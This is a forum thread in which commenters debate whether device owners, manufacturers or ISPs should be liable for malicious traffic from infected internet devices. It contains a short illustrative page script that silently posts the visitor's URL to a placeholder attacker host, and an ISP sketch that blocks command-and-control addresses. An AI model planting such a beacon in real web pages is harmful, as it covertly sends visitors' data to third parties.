You can't expect everyone to be able to identify when their car isn't running as expected. Wait, actually you can, and under the law you must. There are liabilities, too.



Very much not the same thing. Your car can't interact with other people's cars without physical contact, and when it does interact, via a crash or otherwise, it's obvious to anyone. Even if you were constantly watching the traffic of your phone and other devices, you'd probably miss the malicious packets hidden among the thousands of packets each device sends per minute. It's also much harder to recognize what constitutes malicious behavior in an internet device than in your car.

Also, the operation of a car is simple enough that you can take it to a mechanic for an inspection and they can reliably inspect everything the car does. There are no hidden behaviors under complex conditions, like crashing into others when there's a full moon or the sky is cloudy. Your devices can do that. If you bring me your phone/laptop/etc. and ask me whether it's going to send malicious packets to someone at some point, I can't reliably tell you that it won't. I'm not sure that even if you gathered all the software and electronics engineers who were supposedly involved in building your device, they'd be able to give a reliable answer. I can tell you that it seems like it wouldn't, based on initialization files and services, but I can't tell whether the functionality is hidden somehow, like obfuscated in the machine code of the kernel or something. Finding that would require auditing all the assembly code running on the machine, which is not a task for mortals.


I'm liable if my car spontaneously catches fire while parked. The car is just an analogy.


What I'm saying is that it's very simple to inspect a car and make sure it's not going to spontaneously catch fire while parked. You can get a reliable answer in a day from a mechanic.

You can't get a reliable answer on whether a computing device is programmed to send malicious packets. There's too much code, most of it is compiled, and there are too many ways to hide it. You could gather the smartest people in the world and they'd die of old age before arriving at a reliable answer.


We are in the realm of probability in both cases. Oftentimes it's obvious that a PC/device is infected. Sometimes it's really hard to find out: https://en.wikipedia.org/wiki/Stuxnet


The question is whether you feel good enough about that probability to be held liable if the malicious code was hidden well enough. Also, some cases might be obvious on Windows PCs, but I don't think that's necessarily the case with phones. Note that websites can also send malicious packets: when you load a webpage, the code is downloaded and immediately executed. Are you OK with being held liable for visiting a webpage that decided to send malicious packets?


The liability boundary is an important question; there is no simple answer. A couple of years back, the owner of an abandoned building was found liable for the death of a kid who entered the fenced building despite all the no-trespassing signs and so on. Neither your example nor mine negates that there should be liability for various voluntary and involuntary acts, one's own or a third party's.


> A couple of years back, the owner of an abandoned building was found liable for the death of a kid who entered the fenced building despite all the no-trespassing signs and so on.

Honestly, that doesn't sound right. I hope I'm misjudging because of lack of details.


In the US the term is attractive nuisance. It's not a new thing either; case law in the US dates back to the 1870s.


I feel like you're trying very hard to establish a strawman. No one expects 100% perfection. Establishing and following industry standards is a good first step.

Like no unencrypted local passwords. Individual default passwords for every single device. Not shipping outdated versions, especially once vulnerabilities are known. Including an update mechanism and providing updates for at least X years.
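
To make the "individual default passwords" point concrete, here's a minimal sketch (TypeScript on Node.js; names like provisionDevice are made up for illustration, not any vendor's actual code) of what a factory-provisioning step could look like:

    // Hypothetical sketch: generate a unique random default password for
    // each unit instead of shipping "admin/admin" on every device.
    import { randomBytes } from "node:crypto";

    function generateDevicePassword(length = 16): string {
      // Cryptographically random bytes, base64url-encoded so the result
      // can be printed on the unit's label.
      return randomBytes(length).toString("base64url").slice(0, length);
    }

    function provisionDevice(serial: string) {
      const password = generateDevicePassword();
      // Stored on the device and printed on its label; never reused across units.
      return { serial, password };
    }

    console.log(provisionDevice("SN-000123"));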

And yes, trained specialists will be able to work through such checklists for much of the commonly used software, just like your car mechanic does.

And by the way, no one expects your car mechanic to [a] be perfect (have you really never heard of a car breaking down again just after leaving the shop?) or [b] be able to handle any kind of vehicle unknown to him.

The goal of rules like that is to punish the worst tier, thereby raising the bar. But this will probably be harder to implement in the US with its everyone-sues-everyone mindset. Reminds me a lot of the great GDPR scare, but now, imo, quite reasonable actual cases are happening.


> I feel like you're trying very hard to establish a strawman.

This is the second time someone's told me that. Looking into what a strawman is again and reviewing my comments, I'm not sure I'm doing that. The examples I see on Wikipedia[1], at least, don't seem to have a strong relationship of implication; that is, the strawmen aren't directly implied by the proposals they respond to.

In this case, I do think that making someone liable for the damage their machine causes to other people's machines directly implies what I said: that they would be liable for behavior they cannot control as well as they can control the behavior of their car.

My intention is to provide not strawmen, but counterexamples where the proposal fails.

> No one expects 100% perfection.

I do. I'm not really OK with laws where I don't have reasonable control over whether I break them. In this case, the only effective control I'd have is to not own an internet device, and that seems unreasonable.

I think we'd all like to believe otherwise, but the traffic sent by our phones is very much out of our control for the reasons I stated, and nobody reviews the JavaScript code received from an HTTP server before executing it. It seems crazy to be liable for whatever it does.
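
Just to illustrate how little separates "visiting a webpage" from "packets leaving your machine", here's a hypothetical few lines of page script (attacker.example is a placeholder); it runs the instant the page loads and the visitor never reviews it:

    // Hypothetical page script: executes on load, sends traffic wherever
    // it likes, and swallows any errors.
    fetch("https://attacker.example/beacon", {
      method: "POST",
      mode: "no-cors", // fire-and-forget; no CORS error surfaces to the user
      body: JSON.stringify({ visited: location.href }),
    }).catch(() => {
      // Failures stay invisible to the visitor.
    });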

> And by the way, no one expects your car mechanic to [a] be perfect (have you really never heard of a car breaking down again just after leaving the shop?) or [b] be able to handle any kind of vehicle unknown to him.

I think the analogy isn't that strong. Visiting webpages is like swapping car parts every second while the car is running. Malicious behavior in these car parts isn't noticeable at all, and it's not easy to spot through inspection either.

> The goal of rules like that is to punish the worst tier, thereby raising the bar. But this will probably be harder to implement in the US with its everyone-sues-everyone mindset. Reminds me a lot of the great GDPR scare, but now, imo, quite reasonable actual cases are happening.

Well, there were a lot of things that scared people about GDPR, but I think I can assume your point is that a law can be broad and technically applicable to many people unfairly, yet only applied to just cases in practice. I'm not sure I like that kind of law, though. Even if it works well in practice for the majority of cases, it seems like the kind of thing that lends itself to abuse, the kind of law that everybody is guilty of breaking, even if not everyone is actively prosecuted.

[1] https://en.wikipedia.org/wiki/Straw_man#Examples


> What I'm saying is that it's very simple to inspect a car and make sure it's not going to spontaneously catch fire while parked.

With electric cars on the rise, it's only a matter of time until we get the equivalent of the Samsung Galaxy Note 7, but for cars.


Brakes squeal when they are wearing down. If I put a penny in the tread of my tires and see Abe Lincoln’s head I know they are bald. If my head lamps go out I’ll notice; if it’s a brake light I get a red indicator lamp on my dash that says I have a problem.

Let’s talk about liability when home routers make a revving engine sound when they push too many packets per second, or start playing a “buckle up” warning chime every 6 seconds if they see packets heading to a C2 server.


I'm liable if the water/sewage lines break in my condo, and there won't be any 'squeal'. Analogies work but aren't exact. My point is that there should be liability for malfunctioning internet equipment, definitely so for businesses.


Maybe. Or maybe liability exists for outside parties in that case: the plumber who was drunk when they put the pipes in, the architect who designed the wall in such a way as to force a ton of joints into one weak spot, the building inspector who signed off on it... heck, maybe the water company is causing a water hammer to form because their pumps are busted.

Now if my homeowners insurance finds that I flooded the downstairs condo because I fell asleep with the bath running, you bet I’ll pay.

But no matter what, both of your examples have a robust regulatory structure around them in terms of licensing and inspections. That is why liability works: without those structures you can’t say “you fucked up, therefore you pay”.

I’m all for adding liability into the system but if we do we must do it in a way that spreads the burden to the right places (IoT manufacturers, negligent ISPs) and doesn’t push it straight to the consumer.


So the same should apply to IoT? The programmer 'who was drunk when they put the' code in should be liable.


>> I’m all for adding liability into the system but if we do we must do it in a way that spreads the burden to the right places (IoT manufacturers, negligent ISPs) and doesn’t push it straight to the consumer.

Now, having said that, when the limb of my tree knocks the power line off my house I have to pay to fix it, but the electric company is on the hook to send someone to turn the line off so my electrician can work on it.

ISPs have to be in the liability chain too: if one of their customers is talking to a C&C server and participating in a DDoS they have to switch off the customer until repairs can be made.
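
As a rough sketch of what that could look like on the ISP side (the names here, knownC2Addresses and suspendCustomer, are invented for illustration; a real deployment would use threat-intel feeds and an abuse process, not a hard-coded list):

    // Hypothetical TypeScript sketch: flag flows that hit known C&C addresses
    // and suspend the customer until repairs can be made.
    const knownC2Addresses = new Set(["203.0.113.7", "198.51.100.23"]); // documentation-range example IPs

    interface Flow {
      customerId: string;
      dstIp: string;
    }

    function checkFlows(flows: Flow[], suspendCustomer: (id: string) => void): void {
      for (const flow of flows) {
        if (knownC2Addresses.has(flow.dstIp)) {
          suspendCustomer(flow.customerId); // "switch off until repairs can be made"
        }
      }
    }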



